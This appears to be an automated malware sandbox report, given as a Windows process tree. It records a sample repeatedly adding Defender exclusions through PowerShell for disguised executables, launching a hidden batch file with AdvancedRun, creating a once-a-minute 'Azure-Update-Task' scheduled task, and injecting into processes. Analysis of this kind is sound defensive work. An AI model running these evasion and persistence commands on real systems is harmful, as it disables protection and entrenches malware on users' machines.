    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7304
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:192
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6080
- - C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:3648
  - - C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe" /SpecialRun 4101d8 3648
      4⤵
      PID:3096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6396
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:2124
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:6464
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:756
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5204
- - C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:6432
  - - C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe" /SpecialRun 4101d8 6432
      4⤵
      PID:1860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6140
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:816
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:1540
- C:\Users\Admin\AppData\Roaming\jwtwjbt
  C:\Users\Admin\AppData\Roaming\jwtwjbt
  2⤵
  - Suspicious use of SetThreadContext
  PID:3892
- - C:\Users\Admin\AppData\Roaming\jwtwjbt
    C:\Users\Admin\AppData\Roaming\jwtwjbt
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:1576
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2424
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6412
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7488
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6208
- - C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:3192
  - - C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\15076ef2-b898-4b05-9faa-974451807520\AdvancedRun.exe" /SpecialRun 4101d8 3192
      4⤵
      PID:5688
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3096
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:2716
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7176
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4748
